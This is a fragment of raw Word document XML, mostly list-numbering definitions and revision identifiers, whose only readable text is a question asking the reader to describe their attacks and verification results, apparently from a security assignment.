        <w:t>Describe the details of your attacks (including the input you used). What are your verification</w:t>
      </w:r>
      <w:r w:rsidR="001C39C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C39C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>results?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7694C6" w14:textId="77777777" w:rsidR="00A10B9C" w:rsidRDefault="00A10B9C" w:rsidP="00A10B9C">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3668F1" w14:textId="77777777" w:rsidR="00A44C29" w:rsidRPr="00A10B9C" w:rsidRDefault="00A44C29" w:rsidP="00A10B9C">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A44C29" w:rsidRPr="00A10B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F1A33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B940B04"/>
    <w:lvl w:ilvl="0" w:tplc="A21EF58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7D594C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2223274"/>
    <w:lvl w:ilvl="0" w:tplc="802454B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="102F1207"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B940B04"/>
    <w:lvl w:ilvl="0" w:tplc="A21EF58A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="28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528" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4248" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4968" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5688" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6408" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7128" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7848" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="8568" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="13F838B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1E68E4C"/>
    <w:lvl w:ilvl="0" w:tplc="54FEFA30">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="16113353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FB6D360"/>
    <w:lvl w:ilvl="0" w:tplc="04090019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2EC1573C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3AE83802"/>
    <w:lvl w:ilvl="0" w:tplc="414A379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A01087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27D09CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C156AA0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38507D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0AAD970"/>
    <w:lvl w:ilvl="0" w:tplc="98964296">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1152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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4FD678CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E68B0EC"/>
    <w:lvl w:ilvl="0" w:tplc="B274822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595A31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D6CCCAC"/>
    <w:lvl w:ilvl="0" w:tplc="3A9A711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71C1E6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D6CCCAC"/>
    <w:lvl w:ilvl="0" w:tplc="3A9A711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9BF4FC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03D45E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A2036C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87B0DEC0"/>
    <w:lvl w:ilvl="0" w:tplc="30C68BB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B523221"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4D6BEF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B981462"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C93E0436"/>
    <w:lvl w:ilvl="0" w:tplc="94143572">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F5809C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B498A8D6"/>
    <w:lvl w:ilvl="0" w:tplc="94143572">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="610C418F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A672DEA8"/>
    <w:lvl w:ilvl="0" w:tplc="AB820F9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78745E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2223274"/>
    <w:lvl w:ilvl="0" w:tplc="802454B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="692D4277"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D6CCCAC"/>
    <w:lvl w:ilvl="0" w:tplc="3A9A711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9B042F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66E6F212"/>
    <w:lvl w:ilvl="0" w:tplc="766C9194">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E0A5172"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF3AC11E"/>
    <w:lvl w:ilvl="0" w:tplc="963041B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="201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36" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3456" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4176" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4896" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5616" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6336" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7056" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7776" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="713B25C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B940B04"/>
    <w:lvl w:ilvl="0" w:tplc="A21EF58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9C95B15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="796A502C"/>
    <w:lvl w:ilvl="0" w:tplc="4CB405BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7AF13864"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8BE0304"/>
    <w:lvl w:ilvl="0" w:tplc="B542174A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1152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 w16cid:durableId="1842117956">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1149714559">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="729428607">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1127089901">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2082485753">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="169806170">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1020208260">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="930773007">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2050182557">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1069116145">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1807162135">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1784811421">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1248736532">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1483279298">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1962563957">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="391198478">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1714770929">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1600021813">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="721100736">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="507252287">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="513231942">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="255216678">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="2035031516">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="56630062">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="21161898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D03"/>
    <w:rsid w:val="00000B1C"/>
    <w:rsid w:val="00001AF1"/>
    <w:rsid w:val="000026A5"/>
    <w:rsid w:val="000026F5"/>
    <w:rsid w:val="000036BA"/>
    <w:rsid w:val="000052BE"/>
    <w:rsid w:val="00006777"/>
    <w:rsid w:val="00006F2F"/>
    <w:rsid w:val="0001052C"/>
    <w:rsid w:val="00010F1C"/>
    <w:rsid w:val="0001182A"/>
    <w:rsid w:val="00011986"/>
    <w:rsid w:val="00011B18"/>
    <w:rsid w:val="00011BEB"/>
    <w:rsid w:val="00012229"/>
    <w:rsid w:val="00012BE0"/>
    <w:rsid w:val="0001307E"/>
    <w:rsid w:val="0001350D"/>
    <w:rsid w:val="00014090"/>
    <w:rsid w:val="000150AD"/>
    <w:rsid w:val="00016285"/>
    <w:rsid w:val="00017D47"/>
    <w:rsid w:val="00017EE9"/>
    <w:rsid w:val="00020BCA"/>
    <w:rsid w:val="00021B11"/>
    <w:rsid w:val="000221DE"/>
    <w:rsid w:val="00022333"/>
    <w:rsid w:val="00022799"/>
    <w:rsid w:val="000236DA"/>
    <w:rsid w:val="000241F0"/>
    <w:rsid w:val="00024532"/>
    <w:rsid w:val="0002600A"/>
    <w:rsid w:val="00026A72"/>
    <w:rsid w:val="00026D1F"/>
    <w:rsid w:val="000314F1"/>
    <w:rsid w:val="000331BD"/>
    <w:rsid w:val="00033313"/>
    <w:rsid w:val="000333AF"/>
    <w:rsid w:val="00036407"/>
    <w:rsid w:val="00036428"/>
    <w:rsid w:val="000402EC"/>
    <w:rsid w:val="000403F8"/>
    <w:rsid w:val="0004040B"/>
    <w:rsid w:val="0004046E"/>
    <w:rsid w:val="00040A9E"/>
    <w:rsid w:val="00043EA1"/>
    <w:rsid w:val="00044E3C"/>
    <w:rsid w:val="0004673C"/>
    <w:rsid w:val="0004723B"/>
    <w:rsid w:val="0004740B"/>
    <w:rsid w:val="00050A58"/>
    <w:rsid w:val="00051444"/>
    <w:rsid w:val="00052452"/>
    <w:rsid w:val="00053855"/>
    <w:rsid w:val="00053E3F"/>
    <w:rsid w:val="0005487B"/>
    <w:rsid w:val="00054BC4"/>
    <w:rsid w:val="00056FE5"/>
    <w:rsid w:val="0006106E"/>
    <w:rsid w:val="00063394"/>
    <w:rsid w:val="000634F8"/>
    <w:rsid w:val="0006376F"/>
    <w:rsid w:val="00064441"/>
    <w:rsid w:val="00065178"/>
    <w:rsid w:val="000651C8"/>
    <w:rsid w:val="00065216"/>
    <w:rsid w:val="00065CB8"/>
    <w:rsid w:val="00065E69"/>
    <w:rsid w:val="0006630D"/>
    <w:rsid w:val="00066518"/>
    <w:rsid w:val="00066593"/>
    <w:rsid w:val="00070407"/>
    <w:rsid w:val="0007050F"/>
    <w:rsid w:val="00070A63"/>
    <w:rsid w:val="00070D96"/>
    <w:rsid w:val="00070EDA"/>
    <w:rsid w:val="00071745"/>
    <w:rsid w:val="0007412B"/>
    <w:rsid w:val="0007533C"/>
    <w:rsid w:val="0007627B"/>
    <w:rsid w:val="00077DA1"/>
    <w:rsid w:val="00080ED8"/>
    <w:rsid w:val="00081E7A"/>
    <w:rsid w:val="000821F7"/>
    <w:rsid w:val="000824F9"/>
    <w:rsid w:val="0008293E"/>
    <w:rsid w:val="00083137"/>
    <w:rsid w:val="00083637"/>
    <w:rsid w:val="0008366C"/>
    <w:rsid w:val="00083924"/>
    <w:rsid w:val="00083E80"/>
    <w:rsid w:val="00085C4C"/>
    <w:rsid w:val="00086974"/>
    <w:rsid w:val="000869E0"/>
    <w:rsid w:val="00087477"/>
    <w:rsid w:val="00087BB7"/>
    <w:rsid w:val="00090BD4"/>
    <w:rsid w:val="00090E47"/>
    <w:rsid w:val="00090F78"/>
    <w:rsid w:val="00091F70"/>
    <w:rsid w:val="00092EF5"/>
    <w:rsid w:val="00093421"/>
    <w:rsid w:val="0009345A"/>
    <w:rsid w:val="000937F1"/>
    <w:rsid w:val="00094175"/>
    <w:rsid w:val="00094AB8"/>
    <w:rsid w:val="0009588E"/>
    <w:rsid w:val="0009642B"/>
    <w:rsid w:val="000966AE"/>
    <w:rsid w:val="000976C7"/>
    <w:rsid w:val="00097E6A"/>
    <w:rsid w:val="000A0334"/>
    <w:rsid w:val="000A047D"/>
    <w:rsid w:val="000A0969"/>
    <w:rsid w:val="000A0A92"/>
    <w:rsid w:val="000A28E7"/>
    <w:rsid w:val="000A379A"/>
    <w:rsid w:val="000A3E9D"/>
    <w:rsid w:val="000A4F99"/>
    <w:rsid w:val="000A5874"/>
    <w:rsid w:val="000A7FF3"/>
    <w:rsid w:val="000B121F"/>
    <w:rsid w:val="000B2262"/>
    <w:rsid w:val="000B22A1"/>
    <w:rsid w:val="000B239C"/>
    <w:rsid w:val="000B2F7E"/>
    <w:rsid w:val="000B3278"/>
    <w:rsid w:val="000B3C83"/>
    <w:rsid w:val="000B4975"/>
    <w:rsid w:val="000B69E6"/>
    <w:rsid w:val="000C1955"/>
    <w:rsid w:val="000C1EC1"/>
    <w:rsid w:val="000C40F6"/>
    <w:rsid w:val="000C57F1"/>
    <w:rsid w:val="000C70ED"/>
    <w:rsid w:val="000C7385"/>
    <w:rsid w:val="000D09C3"/>
    <w:rsid w:val="000D1014"/>
    <w:rsid w:val="000D2751"/>
    <w:rsid w:val="000D351B"/>
    <w:rsid w:val="000D3616"/>
    <w:rsid w:val="000D5F53"/>
    <w:rsid w:val="000D6E61"/>
    <w:rsid w:val="000D7FA2"/>
    <w:rsid w:val="000E07A2"/>
    <w:rsid w:val="000E0DD9"/>
    <w:rsid w:val="000E1C2B"/>
    <w:rsid w:val="000E23BC"/>
    <w:rsid w:val="000E42E4"/>
    <w:rsid w:val="000E47F5"/>
    <w:rsid w:val="000E5126"/>
    <w:rsid w:val="000E55FB"/>
    <w:rsid w:val="000E7655"/>
    <w:rsid w:val="000E781E"/>
    <w:rsid w:val="000F0278"/>
    <w:rsid w:val="000F04F9"/>
    <w:rsid w:val="000F0838"/>
    <w:rsid w:val="000F0FED"/>
    <w:rsid w:val="000F1278"/>
    <w:rsid w:val="000F1C97"/>
    <w:rsid w:val="000F2CFD"/>
    <w:rsid w:val="000F320D"/>
    <w:rsid w:val="000F3FC9"/>
    <w:rsid w:val="000F428E"/>
    <w:rsid w:val="000F44FE"/>
    <w:rsid w:val="000F4700"/>
    <w:rsid w:val="000F47F4"/>
    <w:rsid w:val="000F4D3C"/>
    <w:rsid w:val="000F4F19"/>
    <w:rsid w:val="000F51A8"/>
    <w:rsid w:val="000F5B26"/>
    <w:rsid w:val="000F5C69"/>
    <w:rsid w:val="000F608D"/>
    <w:rsid w:val="000F620C"/>
    <w:rsid w:val="000F79F1"/>
    <w:rsid w:val="000F7CD4"/>
    <w:rsid w:val="001007D7"/>
    <w:rsid w:val="00100CED"/>
    <w:rsid w:val="00100CF9"/>
    <w:rsid w:val="0010166A"/>
    <w:rsid w:val="001017CB"/>
    <w:rsid w:val="00101F49"/>
    <w:rsid w:val="00102A64"/>
    <w:rsid w:val="00102F4D"/>
    <w:rsid w:val="001032D7"/>
    <w:rsid w:val="001034E5"/>
    <w:rsid w:val="001057E8"/>
    <w:rsid w:val="00105D37"/>
    <w:rsid w:val="00105EBE"/>
    <w:rsid w:val="0010725A"/>
    <w:rsid w:val="00107BC9"/>
    <w:rsid w:val="00107D33"/>
    <w:rsid w:val="001110B4"/>
    <w:rsid w:val="001118AF"/>
    <w:rsid w:val="00111CA0"/>
    <w:rsid w:val="00114CA7"/>
    <w:rsid w:val="00114F12"/>
    <w:rsid w:val="00115564"/>
    <w:rsid w:val="001165B7"/>
    <w:rsid w:val="00116DFC"/>
    <w:rsid w:val="001173CB"/>
    <w:rsid w:val="00117D25"/>
    <w:rsid w:val="00117FA2"/>
    <w:rsid w:val="0012054D"/>
    <w:rsid w:val="00120773"/>
    <w:rsid w:val="00120901"/>
    <w:rsid w:val="00120AF3"/>
    <w:rsid w:val="001217F8"/>
    <w:rsid w:val="0012306A"/>
    <w:rsid w:val="00123B6A"/>
    <w:rsid w:val="00123E08"/>
    <w:rsid w:val="00123F34"/>
    <w:rsid w:val="00125C6B"/>
    <w:rsid w:val="00127C05"/>
    <w:rsid w:val="00127EBC"/>
    <w:rsid w:val="001309E3"/>
    <w:rsid w:val="00131B62"/>
    <w:rsid w:val="00131CCD"/>
    <w:rsid w:val="001323E5"/>
    <w:rsid w:val="00132EEF"/>
    <w:rsid w:val="001339DD"/>
    <w:rsid w:val="00133C3E"/>
    <w:rsid w:val="001352E7"/>
    <w:rsid w:val="00135C8B"/>
    <w:rsid w:val="00137220"/>
    <w:rsid w:val="00137871"/>
    <w:rsid w:val="001406ED"/>
    <w:rsid w:val="001407B0"/>
    <w:rsid w:val="001416B3"/>
    <w:rsid w:val="00141730"/>
    <w:rsid w:val="001434CB"/>
    <w:rsid w:val="001434F1"/>
    <w:rsid w:val="00144747"/>
    <w:rsid w:val="00144D60"/>
    <w:rsid w:val="00144F25"/>
    <w:rsid w:val="00147E92"/>
    <w:rsid w:val="001509F3"/>
    <w:rsid w:val="00150A96"/>
    <w:rsid w:val="001536A7"/>
    <w:rsid w:val="00153A00"/>
    <w:rsid w:val="00153D72"/>
    <w:rsid w:val="0015489A"/>
    <w:rsid w:val="00155115"/>
    <w:rsid w:val="00155BB2"/>
    <w:rsid w:val="001567D6"/>
    <w:rsid w:val="00156CFD"/>
    <w:rsid w:val="00157AEB"/>
    <w:rsid w:val="0016301B"/>
    <w:rsid w:val="00164D2B"/>
    <w:rsid w:val="001672C1"/>
    <w:rsid w:val="001713D4"/>
    <w:rsid w:val="00171512"/>
    <w:rsid w:val="001717E3"/>
    <w:rsid w:val="001729E9"/>
    <w:rsid w:val="00172A99"/>
    <w:rsid w:val="00173F26"/>
    <w:rsid w:val="001741FE"/>
    <w:rsid w:val="00174238"/>
    <w:rsid w:val="00175F40"/>
    <w:rsid w:val="00176923"/>
    <w:rsid w:val="001772A7"/>
    <w:rsid w:val="00177F97"/>
    <w:rsid w:val="00180607"/>
    <w:rsid w:val="001818FC"/>
    <w:rsid w:val="00181E67"/>
    <w:rsid w:val="001824A3"/>
    <w:rsid w:val="00183881"/>
    <w:rsid w:val="0018558C"/>
    <w:rsid w:val="00186146"/>
    <w:rsid w:val="0018636E"/>
    <w:rsid w:val="00186890"/>
    <w:rsid w:val="00186C0B"/>
    <w:rsid w:val="0018744E"/>
    <w:rsid w:val="00187522"/>
    <w:rsid w:val="001917C1"/>
    <w:rsid w:val="00192322"/>
    <w:rsid w:val="0019338A"/>
    <w:rsid w:val="00193C39"/>
    <w:rsid w:val="001949E2"/>
    <w:rsid w:val="0019551D"/>
    <w:rsid w:val="0019581F"/>
    <w:rsid w:val="001960BC"/>
    <w:rsid w:val="00196EE3"/>
    <w:rsid w:val="001972FB"/>
    <w:rsid w:val="00197A51"/>
    <w:rsid w:val="001A10C1"/>
    <w:rsid w:val="001A16E2"/>
    <w:rsid w:val="001A2F6D"/>
    <w:rsid w:val="001A44F2"/>
    <w:rsid w:val="001A4B9E"/>
    <w:rsid w:val="001A57BE"/>
    <w:rsid w:val="001A5D0C"/>
    <w:rsid w:val="001A6048"/>
    <w:rsid w:val="001A7D82"/>
    <w:rsid w:val="001A7DA3"/>
    <w:rsid w:val="001B10FF"/>
    <w:rsid w:val="001B2F4D"/>
    <w:rsid w:val="001B3468"/>
    <w:rsid w:val="001B37F8"/>
    <w:rsid w:val="001B3981"/>
    <w:rsid w:val="001B3B03"/>
    <w:rsid w:val="001B3CD7"/>
    <w:rsid w:val="001B3E3F"/>
    <w:rsid w:val="001B437E"/>
    <w:rsid w:val="001B4A32"/>
    <w:rsid w:val="001B4E2D"/>
    <w:rsid w:val="001B4EA9"/>
    <w:rsid w:val="001B5959"/>
    <w:rsid w:val="001B5F3B"/>
    <w:rsid w:val="001C0C77"/>
    <w:rsid w:val="001C2A91"/>
    <w:rsid w:val="001C39C3"/>
    <w:rsid w:val="001C3D85"/>
    <w:rsid w:val="001C4D63"/>
    <w:rsid w:val="001C4DB5"/>
    <w:rsid w:val="001C4DE3"/>
    <w:rsid w:val="001C4F39"/>
    <w:rsid w:val="001C68A6"/>
    <w:rsid w:val="001C6925"/>
    <w:rsid w:val="001C7412"/>
    <w:rsid w:val="001C78E1"/>
    <w:rsid w:val="001C7F2A"/>
    <w:rsid w:val="001D2223"/>
    <w:rsid w:val="001D298F"/>
    <w:rsid w:val="001D2AF8"/>
    <w:rsid w:val="001D2B27"/>
    <w:rsid w:val="001D2EBE"/>
    <w:rsid w:val="001D4396"/>
    <w:rsid w:val="001D484E"/>
    <w:rsid w:val="001D4DFA"/>
    <w:rsid w:val="001D5300"/>
    <w:rsid w:val="001D6D6E"/>
    <w:rsid w:val="001D7DDD"/>
    <w:rsid w:val="001E0478"/>
    <w:rsid w:val="001E078C"/>
    <w:rsid w:val="001E1099"/>
    <w:rsid w:val="001E1F97"/>
    <w:rsid w:val="001E3148"/>
    <w:rsid w:val="001E46EA"/>
    <w:rsid w:val="001E4753"/>
    <w:rsid w:val="001E50A8"/>
    <w:rsid w:val="001E717F"/>
    <w:rsid w:val="001E76D0"/>
    <w:rsid w:val="001E79D4"/>
    <w:rsid w:val="001F0737"/>
    <w:rsid w:val="001F2A0B"/>
    <w:rsid w:val="001F2BDA"/>
    <w:rsid w:val="001F30CF"/>
    <w:rsid w:val="001F38B6"/>
    <w:rsid w:val="001F3D2F"/>
    <w:rsid w:val="001F4687"/>
    <w:rsid w:val="001F5547"/>
    <w:rsid w:val="001F55AA"/>
    <w:rsid w:val="001F5647"/>
    <w:rsid w:val="001F58E0"/>
    <w:rsid w:val="001F67CA"/>
    <w:rsid w:val="001F753E"/>
    <w:rsid w:val="00200776"/>
    <w:rsid w:val="00200B08"/>
    <w:rsid w:val="0020306A"/>
    <w:rsid w:val="0020358F"/>
    <w:rsid w:val="002035A8"/>
    <w:rsid w:val="00205065"/>
    <w:rsid w:val="00205308"/>
    <w:rsid w:val="002057E0"/>
    <w:rsid w:val="00207198"/>
    <w:rsid w:val="00212CAA"/>
    <w:rsid w:val="00212DBD"/>
    <w:rsid w:val="00212E9D"/>
    <w:rsid w:val="002153A7"/>
    <w:rsid w:val="0021584C"/>
    <w:rsid w:val="00215D3E"/>
    <w:rsid w:val="00217EDC"/>
    <w:rsid w:val="00217F58"/>
    <w:rsid w:val="0022013D"/>
    <w:rsid w:val="002208F9"/>
    <w:rsid w:val="002218EE"/>
